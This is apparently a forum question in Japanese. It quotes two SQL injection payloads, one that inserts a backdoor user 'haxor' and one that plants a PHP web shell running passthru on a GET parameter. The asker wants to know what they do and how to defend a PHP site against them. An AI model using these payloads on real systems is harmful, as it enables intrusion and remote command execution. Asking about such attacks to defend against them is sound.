1.
' union select 1, 'users (user, password) values (\'haxor\',
\'1337\') #', 2 #
2.
' union select 1, 'modules (plugin) values (\'if
(isset($_GET[\\\'cmd\\\'])) {passthru($_GET[\\\'cmd\\\']);}\') #', 2
#
- それらのコード スニペットは何をしますか?
- ファイルでそれらを防ぐにはどうすればよい
php
ですか? - 1337とは?そして、なぜ多くの \ があるのですか?